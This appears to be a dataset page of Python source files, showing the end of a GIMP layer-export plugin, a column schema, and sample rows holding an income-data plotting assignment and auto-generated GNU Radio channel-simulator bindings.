        with open(html_filepath, "wb") as f:
            f.write(self.html)

def export_layers_to_css(img, drw, path, scale=1, only_named=False):
    base_name = "graphics-" + img.name.rsplit('.', 1)[0]

    pdb.gimp_message('Only named: %d'%only_named)
    dupe = img.duplicate()
    css = Css(base_name=base_name, scale=scale, only_named=only_named)

    def parse_layers(layers, level=0, offset_y=0):
        for layer in layers:
            layer.visible = True
            if hasattr(layer, "layers") and layer.layers:
                offset_y = parse_layers(layer.layers, level+1, offset_y)
            else:
                layer.set_offsets(0, offset_y)
                try:
                    css.add_layer(layer)
                    offset_y += layer.height
                except:
                    layer.visible = False
        return offset_y

    offset_y = parse_layers(dupe.layers)
    merged_layer = dupe.merge_visible_layers(EXPAND_AS_NECESSARY)
# pdb.gimp_message('Done. offset_y=%d image.height=%d'%(offset_y, merged_layer.height))
    css.save(path=path, image_width=merged_layer.width)
    image_filename = base_name + ".png"
    image_filepath = os.path.join(path, image_filename);
    pdb.file_png_save(dupe, merged_layer, image_filepath, image_filename, 0, 9, 1, 1, 1, 1, 1)
    gimp.delete(dupe)

register(
    proc_name=("python-fu-layers-to-css"),
    blurb=("Export Layers to one PNG with CSS stylesheet"),
    help=("""Export Layers to one PNG with CSS stylesheet

    """),
    author=("Per Rosengren"),
    copyright=("Stunning AB"),
    date=("2012"),
    label=("to _CSS"),
    imagetypes=("*"),
    params=[
        (PF_IMAGE, "img", "Image", None),
        (PF_DRAWABLE, "drw", "Drawable", None),
        (PF_DIRNAME, "path", "Save PNG and CSS here", os.getcwd()),
        (PF_INT, "scale", "The scale of the image", 1),
        (PF_BOOL, "only_named", "Only export layers named .", False),
    ],
    results=[],
    function=(export_layers_to_css),
    menu=("/File/E_xport Layers"),
    domain=("gimp20-python", gimp.locale_directory)
)

main()

src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
year: 2012
Dataset columns (name: type, observed value or length range):

__id__: int64 (3.09k to 19,722B)
blob_id: string (length 40 to 40)
directory_id: string (length 40 to 40)
path: string (length 2 to 256)
content_id: string (length 40 to 40)
detected_licenses: list
license_type: string (3 classes)
repo_name: string (length 5 to 109)
repo_url: string (length 24 to 128)
snapshot_id: string (length 40 to 40)
revision_id: string (length 40 to 40)
branch_name: string (length 4 to 42)
visit_date: timestamp[ns]
revision_date: timestamp[ns]
committer_date: timestamp[ns]
github_id: int64 (6.65k to 581M)
star_events_count: int64 (0 to 1.17k)
fork_events_count: int64 (0 to 154)
gha_license_id: string (16 classes)
gha_fork: bool (2 classes)
gha_event_created_at: timestamp[ns]
gha_created_at: timestamp[ns]
gha_updated_at: timestamp[ns]
gha_pushed_at: timestamp[ns]
gha_size: int64 (0 to 5.76M)
gha_stargazers_count: int32 (0 to 407)
gha_forks_count: int32 (0 to 119)
gha_open_issues_count: int32 (0 to 640)
gha_language: string (length 1 to 16)
gha_archived: bool (2 classes)
gha_disabled: bool (1 class)
content: string (length 9 to 4.53M)
src_encoding: string (18 classes)
language: string (1 value)
is_vendor: bool (2 classes)
is_generated: bool (2 classes)
year: int64 (1.97k to 2.01k)
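These columns are exactly the keys each row exposes when the dataset is loaded programmatically. A minimal sketch of streaming a few rows and reading the metadata, assuming the dataset id is loubnabnl/old_python (the id this viewer page belongs to) and that a train split exists:

from itertools import islice
from datasets import load_dataset

# Assumptions: dataset id and split name; adjust if the hub page lists others.
ds = load_dataset("loubnabnl/old_python", split="train", streaming=True)

for row in islice(ds, 3):
    # Each row is a plain dict keyed by the column names listed above.
    # The "content" string can run to several MB, so only its length is printed.
    print(row["repo_name"], row["path"], row["license_type"], row["year"],
          "content chars:", len(row["content"]))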
Sample row 1:
__id__: 8,263,517,092,121
blob_id: 9a5c3c534acf7c4cb420b8e42b809375c7a96c5d
directory_id: 6b826e7857ac9d785d5451a94185f67b823a0b1b
path: /mer567/Assignment9.py
content_id: 65414bde47c96e3728db0faf202562bc6e361712
detected_licenses: []
license_type: no_license
repo_name: mrotmensch/assignment9
repo_url: https://github.com/mrotmensch/assignment9
snapshot_id: 6bc5f2fc2ade7b842896543455ac9ad4e8058f15
revision_id: ecfb7787e3bfde8f6199cda35130d074dc11b006
branch_name: refs/heads/master
visit_date: 2021-01-18T05:09:23.618656
revision_date: 2014-11-22T00:03:10
committer_date: 2014-11-22T00:03:10
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_fork: null
gha_event_created_at: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_size: null
gha_stargazers_count: null
gha_forks_count: null
gha_open_issues_count: null
gha_language: null
gha_archived: null
gha_disabled: null
content:
############################# # # # Assignment 9 # # Maya Rotmensch # # # ############################# """ Formatting for doc strings was done according to google style guide https://google-styleguide.googlecode.com/svn/trunk/pyguide.html""" from pylab import rcParams from collections import defaultdict import pandas as pd import numpy as np import matplotlib.pyplot as plt def loadData(): countries = pd.read_csv("countries.csv") income_initial = pd.ExcelFile("indicator gapminder gdp_per_capita_ppp.xlsx") dfs = {sheet_name: income_initial.parse(sheet_name) for sheet_name in income_initial.sheet_names} income = dfs['Data'] # we only care about the sheet containing the data income_transformed = income.set_index("gdp pc test").T return countries, income_transformed def incomeDistribution(year): """ Graphes the income distribution for a given year. ignores missing (Nan) values Args: year: the year for which the distribution is calculated. must be inputed in int form (not string!). Returns: saves .png of distribution. """ rcParams['figure.figsize'] = 15,7 income_for_given_year = income.ix[year] plottable_values = income_for_given_year[income_for_given_year.notnull()] plt.hist(plottable_values, bins = 50) plt.title("Distribution of income across countries \n for the year %s" %year) plt.xlabel("Income per person") plt.ylabel("Counts") plt.savefig("incomeDistribution for %s" %year) plt.show() return def merge_by_year(year, all_infomation_present = True): """ Merges the income and countries DataFrames for a given year. Columns are 'Country', 'Region', and 'Income'. Args: year: int. the year for which the distribution is calculated. all_infomation_present: boolean. If true performs inner join. If false performs outer join and keeps all rows with partial information (will discard rows with missing information for both region and income fields) Returns: merged_2 : a merged pandas DataFrame for the given year. """ countries_shifted_index = countries.set_index('Country') income_given_year = income.ix[year] if all_infomation_present == True: merged = pd.concat([countries_shifted_index,income_given_year], axis = 1, join = "inner") else: merged = pd.concat([countries_shifted_index,income_given_year], axis = 1, join = "outer") merged = merged.dropna(how = "all") #drop rows with no information of region and income. merged_2 = merged.reset_index(level=0) merged_2.columns = ['Country', 'Region', 'Income'] return merged_2 def incomeOverTime(country): """ graphs change in the income per person for a given country over time. ignores missing information. Args: country: string. country for which the analysis is performed. Returns: save .png of change of Income over time. Raises: NotEnoughInformation: If less than less than 2 information points. """ country_income_timeline = income[country] income_not_null = country_income_timeline[country_income_timeline.notnull()] if len(income_not_null>2): # must have more than 2 points to plot plt.plot(income_not_null.index,income_not_null) plt.xlabel("Year") plt.ylabel("Income") plt.xlim((income_not_null.index[0],income_not_null.index[-1])) plt.title("Change of Income over time in %s" %country) plt.savefig("Change of Income over time in %s.png" %country) plt.show() return def distributionOfIcomeByRegion(year): """Graphes the distribution of income per person by region. ignores null values. Args: year: int. the year for which the analysis will be performed. Returns: 6 sub plots (all histoggrams) depicting the distribution of income for region by year. 
note that the distributions are normalized. saves plot grid as .png """ merged = merge_by_year(year) #get info for year regions = countries.Region.unique() regions = np.array(regions).reshape(3,2) f, axarr = plt.subplots(regions.shape[0], regions.shape[1]) #create grid #populate subplots. for i in range(regions.shape[0]): for j in range(regions.shape[1]): r = regions[i,j] income_per_region = merged.Income[merged.Region== regions[i,j]] income_not_null = income_per_region[income_per_region.notnull()] axarr[i, j].hist(income_not_null.values, bins = 20, normed = True) axarr[i, j].set_title("Distribution of income for %s in year %s" %(str(regions[i,j]),year)) plt.tight_layout() plt.savefig("Distribution of income for %s in year %s" %(str(regions[i,j]),year)) plt.show() return def MeanIncomeOverTime(region): """Plots the mean income per person in a given region over time. analysis ignores null values. Args: region: string. the region for which the analysis will be performed. Returns: a graph of the change in income over time. plot saved as .png """ over_time = [] #calculate mean income per person in region for given year for i in income.index: merged = merge_by_year(i) income_per_region = merged.Income[merged.Region== region].mean() over_time.append(income_per_region) plt.plot(income.index,over_time) plt.xlabel("Year") plt.ylabel("Income") plt.xlim((income.index[0],income.index[-1])) plt.title("Change of Income over time in %s" %region) plt.savefig("Change of Income over time in %s" %region) plt.show() return def MeanIncomeOverTimeAllRegions(): """ Plots the mean income per person in a given region over time. ovelays the graphs for the different regions for easier comparison. analysis ignores null values. Args: none. Returns: a graph of the change in income over time. plot saved as .png """ over_time = defaultdict(list) # dictionary of mean icome per person for region. keys are regions. for i in income.index: merged = merge_by_year(i) for region in countries.Region.unique(): income_per_region = merged.Income[merged.Region== region].mean() over_time[region].append(income_per_region) DF = pd.DataFrame(over_time, index=income.index) plt.plot(DF.index,DF.values) plt.legend(DF.columns, loc = 2) plt.xlabel("Year") plt.ylabel("Income") plt.xlim((DF.index[0],DF.index[-1])) plt.title("Change of Income over time") plt.savefig("Change of Income over time in all regions") plt.show() return DF def spreadByYear(year): """ Plots (boxplot) the spread of income per person for the regions for a given year. Args: year: int. the year for which the distribution is calculated. Returns: a box plot demostratint the difference in the spread of income per person for the different regions. 
""" merged = merge_by_year(year) spread = [] for region in merged.Region.unique(): spread_per_region = merged.Income[merged.Region== region] spread.append(spread_per_region.values) rcParams['figure.figsize'] = 15,7 plt.boxplot(spread) ticks = list(merged.Region.unique()) ticks.insert(0, "") plt.xticks(range(7), ticks, color='red') plt.ylabel("Income") plt.title("Spread of of Income for the year %s" %year) plt.savefig("Spread of of Income for the year %s" %year) plt.show() if __name__ == "__main__": countries, income = loadData() #Question 2: print "Head of income DF: \n", income.head() #Question 3: incomeDistribution(2000) #Question 4: merged = merge_by_year(2000) print "Head of merged DF: \n", merged.head() #Quetion 5: incomeOverTime("Afghanistan") distributionOfIcomeByRegion(2010) MeanIncomeOverTime("AFRICA") DF = MeanIncomeOverTimeAllRegions() spreadByYear(2010) """ Analysis of the graphs has shown that aggragating all countries, the distribution of income is right skewed. We can also tell that while Europe boasts the highest income per person, the income has decreased in recent years. Europe is also the region that has the largest spread in income per person in recent years (this is easy to see through the boxplot).In addition, we can see that in recent years Asia is experiencing the steepest ascent in income per person. """
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
year: 2014
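A row's metadata is usually enough to filter the corpus without downloading the content strings into memory all at once. A hedged sketch of one possible filter, reusing the assumed dataset id and split from the previous snippet; the predicate is purely illustrative and not part of the dataset's own tooling:

from itertools import islice
from datasets import load_dataset

ds = load_dataset("loubnabnl/old_python", split="train", streaming=True)

def keep(row):
    # Illustrative predicate: human-written (not vendored or generated) files
    # that carry a detected license and were committed in 2014 or later.
    return (not row["is_vendor"]
            and not row["is_generated"]
            and row["license_type"] != "no_license"
            and row["year"] >= 2014)

for row in islice(ds.filter(keep), 2):
    print(row["repo_url"], row["path"])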
Sample row 2:
__id__: 6,975,026,930,732
blob_id: ca209574c521fedf9938ebd87bd33bb85016bfc0
directory_id: c6e9e30cb39698c346eb24b3eeef7e3a5c570032
path: /gnuradio/build_debug/gr-channels/swig/channels_swig.py
content_id: 891d48d17060e67ad33170beed7f4781cc0e1eec
detected_licenses: []
license_type: no_license
repo_name: Darren2340/local_gnuradio
repo_url: https://github.com/Darren2340/local_gnuradio
snapshot_id: 283ae020e21a64607fd0721f0c54217dccb5655d
revision_id: db05a74ab64a5dfae6bca70dfcf57019153c64b5
branch_name: refs/heads/master
visit_date: 2021-01-20T11:25:54.372134
revision_date: 2014-07-14T23:42:55
committer_date: 2014-07-14T23:42:55
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_fork: null
gha_event_created_at: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_size: null
gha_stargazers_count: null
gha_forks_count: null
gha_open_issues_count: null
gha_language: null
gha_archived: null
gha_disabled: null
content:
# This file was automatically generated by SWIG (http://www.swig.org). # Version 2.0.11 # # Do not make changes to this file unless you know what you are doing--modify # the SWIG interface file instead. from sys import version_info if version_info >= (2,6,0): def swig_import_helper(): from os.path import dirname import imp fp = None try: fp, pathname, description = imp.find_module('_channels_swig', [dirname(__file__)]) except ImportError: import _channels_swig return _channels_swig if fp is not None: try: _mod = imp.load_module('_channels_swig', fp, pathname, description) finally: fp.close() return _mod _channels_swig = swig_import_helper() del swig_import_helper else: import _channels_swig del version_info try: _swig_property = property except NameError: pass # Python < 2.2 doesn't have 'property'. def _swig_setattr_nondynamic(self,class_type,name,value,static=1): if (name == "thisown"): return self.this.own(value) if (name == "this"): if type(value).__name__ == 'SwigPyObject': self.__dict__[name] = value return method = class_type.__swig_setmethods__.get(name,None) if method: return method(self,value) if (not static): self.__dict__[name] = value else: raise AttributeError("You cannot add attributes to %s" % self) def _swig_setattr(self,class_type,name,value): return _swig_setattr_nondynamic(self,class_type,name,value,0) def _swig_getattr(self,class_type,name): if (name == "thisown"): return self.this.own() method = class_type.__swig_getmethods__.get(name,None) if method: return method(self) raise AttributeError(name) def _swig_repr(self): try: strthis = "proxy of " + self.this.__repr__() except: strthis = "" return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,) try: _object = object _newclass = 1 except AttributeError: class _object : pass _newclass = 0 def _swig_setattr_nondynamic_method(set): def set_attr(self,name,value): if (name == "thisown"): return self.this.own(value) if hasattr(self,name) or (name == "this"): set(self,name,value) else: raise AttributeError("You cannot add attributes to %s" % self) return set_attr def high_res_timer_now(): """high_res_timer_now() -> gr::high_res_timer_type""" return _channels_swig.high_res_timer_now() def high_res_timer_now_perfmon(): """high_res_timer_now_perfmon() -> gr::high_res_timer_type""" return _channels_swig.high_res_timer_now_perfmon() def high_res_timer_tps(): """high_res_timer_tps() -> gr::high_res_timer_type""" return _channels_swig.high_res_timer_tps() def high_res_timer_epoch(): """high_res_timer_epoch() -> gr::high_res_timer_type""" return _channels_swig.high_res_timer_epoch() class channel_model(object): """ Basic channel simulator. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), a (normalized) frequency offset (), a sample timing offset (), and a seed () to randomize or make reproducable the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . To simulate a channel with time-variant channel, use gr::channels::channel_model2. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). frequency_offset : The normalized frequency offset. 
0 is no offset; 0.25 would be, for a digital modem, one quarter of the symbol rate. epsilon : The sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double noise_voltage=0.0, double frequency_offset=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model_sptr Basic channel simulator. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), a (normalized) frequency offset (), a sample timing offset (), and a seed () to randomize or make reproducable the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . To simulate a channel with time-variant channel, use gr::channels::channel_model2. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). frequency_offset : The normalized frequency offset. 0 is no offset; 0.25 would be, for a digital modem, one quarter of the symbol rate. epsilon : The sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. 
""" return _channels_swig.channel_model_make(*args, **kwargs) make = staticmethod(make) def set_noise_voltage(self, *args, **kwargs): """set_noise_voltage(channel_model self, double noise_voltage)""" return _channels_swig.channel_model_set_noise_voltage(self, *args, **kwargs) def set_frequency_offset(self, *args, **kwargs): """set_frequency_offset(channel_model self, double frequency_offset)""" return _channels_swig.channel_model_set_frequency_offset(self, *args, **kwargs) def set_taps(self, *args, **kwargs): """set_taps(channel_model self, pmt_vector_cfloat taps)""" return _channels_swig.channel_model_set_taps(self, *args, **kwargs) def set_timing_offset(self, *args, **kwargs): """set_timing_offset(channel_model self, double epsilon)""" return _channels_swig.channel_model_set_timing_offset(self, *args, **kwargs) def noise_voltage(self): """noise_voltage(channel_model self) -> double""" return _channels_swig.channel_model_noise_voltage(self) def frequency_offset(self): """frequency_offset(channel_model self) -> double""" return _channels_swig.channel_model_frequency_offset(self) def taps(self): """taps(channel_model self) -> pmt_vector_cfloat""" return _channels_swig.channel_model_taps(self) def timing_offset(self): """timing_offset(channel_model self) -> double""" return _channels_swig.channel_model_timing_offset(self) __swig_destroy__ = _channels_swig.delete_channel_model __del__ = lambda self : None; channel_model_swigregister = _channels_swig.channel_model_swigregister channel_model_swigregister(channel_model) def channel_model_make(*args, **kwargs): """ channel_model_make(double noise_voltage=0.0, double frequency_offset=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model_sptr Basic channel simulator. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), a (normalized) frequency offset (), a sample timing offset (), and a seed () to randomize or make reproducable the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . To simulate a channel with time-variant channel, use gr::channels::channel_model2. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). frequency_offset : The normalized frequency offset. 0 is no offset; 0.25 would be, for a digital modem, one quarter of the symbol rate. epsilon : The sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ return _channels_swig.channel_model_make(*args, **kwargs) class channel_model2(object): """ Basic channel simulator allowing time-varying frequency and timing inputs. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), an initial timing offset (), and a seed () to randomize the AWGN noise source. 
Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . Unlike gr::channels::channel_model, this block is designed to enable time-varying frequency and timing offsets. Since the models for frequency and timing offset may vary and what we are trying to model may be different for different simulations, we provide the time-varying nature as an input function that is user-defined. If only constant frequency and timing offsets are required, it is easier and less expensive to use gr::channels::channel_model. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). epsilon : The initial sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double noise_voltage=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model2_sptr Basic channel simulator allowing time-varying frequency and timing inputs. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), an initial timing offset (), and a seed () to randomize the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . Unlike gr::channels::channel_model, this block is designed to enable time-varying frequency and timing offsets. Since the models for frequency and timing offset may vary and what we are trying to model may be different for different simulations, we provide the time-varying nature as an input function that is user-defined. If only constant frequency and timing offsets are required, it is easier and less expensive to use gr::channels::channel_model. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). epsilon : The initial sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. 
""" return _channels_swig.channel_model2_make(*args, **kwargs) make = staticmethod(make) def set_noise_voltage(self, *args, **kwargs): """set_noise_voltage(channel_model2 self, double noise_voltage)""" return _channels_swig.channel_model2_set_noise_voltage(self, *args, **kwargs) def set_taps(self, *args, **kwargs): """set_taps(channel_model2 self, pmt_vector_cfloat taps)""" return _channels_swig.channel_model2_set_taps(self, *args, **kwargs) def set_timing_offset(self, *args, **kwargs): """set_timing_offset(channel_model2 self, double epsilon)""" return _channels_swig.channel_model2_set_timing_offset(self, *args, **kwargs) def noise_voltage(self): """noise_voltage(channel_model2 self) -> double""" return _channels_swig.channel_model2_noise_voltage(self) def taps(self): """taps(channel_model2 self) -> pmt_vector_cfloat""" return _channels_swig.channel_model2_taps(self) def timing_offset(self): """timing_offset(channel_model2 self) -> double""" return _channels_swig.channel_model2_timing_offset(self) __swig_destroy__ = _channels_swig.delete_channel_model2 __del__ = lambda self : None; channel_model2_swigregister = _channels_swig.channel_model2_swigregister channel_model2_swigregister(channel_model2) def channel_model2_make(*args, **kwargs): """ channel_model2_make(double noise_voltage=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model2_sptr Basic channel simulator allowing time-varying frequency and timing inputs. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), an initial timing offset (), and a seed () to randomize the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . Unlike gr::channels::channel_model, this block is designed to enable time-varying frequency and timing offsets. Since the models for frequency and timing offset may vary and what we are trying to model may be different for different simulations, we provide the time-varying nature as an input function that is user-defined. If only constant frequency and timing offsets are required, it is easier and less expensive to use gr::channels::channel_model. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). epsilon : The initial sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ return _channels_swig.channel_model2_make(*args, **kwargs) class cfo_model(object): """ channel simulator This block implements a carrier frequency offset model that can be used to simulate carrier frequency drift typically from mixer LO drift on either transmit or receive hardware. A clipped gaussian random walk process is used. Constructor Specific Documentation: Build the carrier frequency offset model. 
Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum carrier frequency deviation in Hz. noise_seed : A random number generator seed for the noise source. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> cfo_model_sptr channel simulator This block implements a carrier frequency offset model that can be used to simulate carrier frequency drift typically from mixer LO drift on either transmit or receive hardware. A clipped gaussian random walk process is used. Constructor Specific Documentation: Build the carrier frequency offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum carrier frequency deviation in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.cfo_model_make(*args, **kwargs) make = staticmethod(make) def set_std_dev(self, *args, **kwargs): """set_std_dev(cfo_model self, double _dev)""" return _channels_swig.cfo_model_set_std_dev(self, *args, **kwargs) def set_max_dev(self, *args, **kwargs): """set_max_dev(cfo_model self, double _dev)""" return _channels_swig.cfo_model_set_max_dev(self, *args, **kwargs) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(cfo_model self, double _rate)""" return _channels_swig.cfo_model_set_samp_rate(self, *args, **kwargs) def std_dev(self): """std_dev(cfo_model self) -> double""" return _channels_swig.cfo_model_std_dev(self) def max_dev(self): """max_dev(cfo_model self) -> double""" return _channels_swig.cfo_model_max_dev(self) def samp_rate(self): """samp_rate(cfo_model self) -> double""" return _channels_swig.cfo_model_samp_rate(self) __swig_destroy__ = _channels_swig.delete_cfo_model __del__ = lambda self : None; cfo_model_swigregister = _channels_swig.cfo_model_swigregister cfo_model_swigregister(cfo_model) def cfo_model_make(*args, **kwargs): """ cfo_model_make(double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> cfo_model_sptr channel simulator This block implements a carrier frequency offset model that can be used to simulate carrier frequency drift typically from mixer LO drift on either transmit or receive hardware. A clipped gaussian random walk process is used. Constructor Specific Documentation: Build the carrier frequency offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum carrier frequency deviation in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.cfo_model_make(*args, **kwargs) class dynamic_channel_model(object): """ dynamic channel simulator This block implements a dynamic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. 
This model allows the user to set up an AWGN noise cource, a random walk process to simulate carrier frequency drift, a random walk process to simulate sample rate offset drive, and a frequency selective fading channel response that is either Rayleigh or Ricean for a user specified power delay profile. Constructor Specific Documentation: Build the dynamic channel simulator. Args: samp_rate : Input sample rate in Hz sro_std_dev : sample rate drift process standard deviation per sample in Hz sro_max_dev : maximum sample rate offset in Hz cfo_std_dev : carrier frequnecy drift process standard deviation per sample in Hz cfo_max_dev : maximum carrier frequency offset in Hz N : number of sinusoids used in frequency selective fading simulation doppler_freq : maximum doppler frequency used in fading simulation in Hz LOS_model : defines whether the fading model should include a line of site component. LOS->Rician, NLOS->Rayleigh K : Rician K-factor, the ratio of specular to diffuse power in the model delays : A list of fractional sample delays making up the power delay profile mags : A list of magnitudes corresponding to each delay time in the power delay profile ntaps_mpath : The length of the filter to interpolate the power delay profile over. Delays in the PDP must lie between 0 and ntaps_mpath, fractional delays will be sinc-interpolated only to the width of this filter. noise_amp : Specifies the standard deviation of the AWGN process noise_seed : A random number generator seed for the noise source. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double samp_rate, double sro_std_dev, double sro_max_dev, double cfo_std_dev, double cfo_max_dev, unsigned int N, double doppler_freq, bool LOS_model, float K, pmt_vector_float delays, pmt_vector_float mags, int ntaps_mpath, double noise_amp, double noise_seed) -> dynamic_channel_model_sptr dynamic channel simulator This block implements a dynamic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set up an AWGN noise cource, a random walk process to simulate carrier frequency drift, a random walk process to simulate sample rate offset drive, and a frequency selective fading channel response that is either Rayleigh or Ricean for a user specified power delay profile. Constructor Specific Documentation: Build the dynamic channel simulator. Args: samp_rate : Input sample rate in Hz sro_std_dev : sample rate drift process standard deviation per sample in Hz sro_max_dev : maximum sample rate offset in Hz cfo_std_dev : carrier frequnecy drift process standard deviation per sample in Hz cfo_max_dev : maximum carrier frequency offset in Hz N : number of sinusoids used in frequency selective fading simulation doppler_freq : maximum doppler frequency used in fading simulation in Hz LOS_model : defines whether the fading model should include a line of site component. LOS->Rician, NLOS->Rayleigh K : Rician K-factor, the ratio of specular to diffuse power in the model delays : A list of fractional sample delays making up the power delay profile mags : A list of magnitudes corresponding to each delay time in the power delay profile ntaps_mpath : The length of the filter to interpolate the power delay profile over. 
Delays in the PDP must lie between 0 and ntaps_mpath, fractional delays will be sinc-interpolated only to the width of this filter. noise_amp : Specifies the standard deviation of the AWGN process noise_seed : A random number generator seed for the noise source. """ return _channels_swig.dynamic_channel_model_make(*args, **kwargs) make = staticmethod(make) def samp_rate(self): """samp_rate(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_samp_rate(self) def sro_dev_std(self): """sro_dev_std(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_sro_dev_std(self) def sro_dev_max(self): """sro_dev_max(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_sro_dev_max(self) def cfo_dev_std(self): """cfo_dev_std(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_cfo_dev_std(self) def cfo_dev_max(self): """cfo_dev_max(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_cfo_dev_max(self) def noise_amp(self): """noise_amp(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_noise_amp(self) def doppler_freq(self): """doppler_freq(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_doppler_freq(self) def K(self): """K(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_K(self) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_samp_rate(self, *args, **kwargs) def set_sro_dev_std(self, *args, **kwargs): """set_sro_dev_std(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_sro_dev_std(self, *args, **kwargs) def set_sro_dev_max(self, *args, **kwargs): """set_sro_dev_max(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_sro_dev_max(self, *args, **kwargs) def 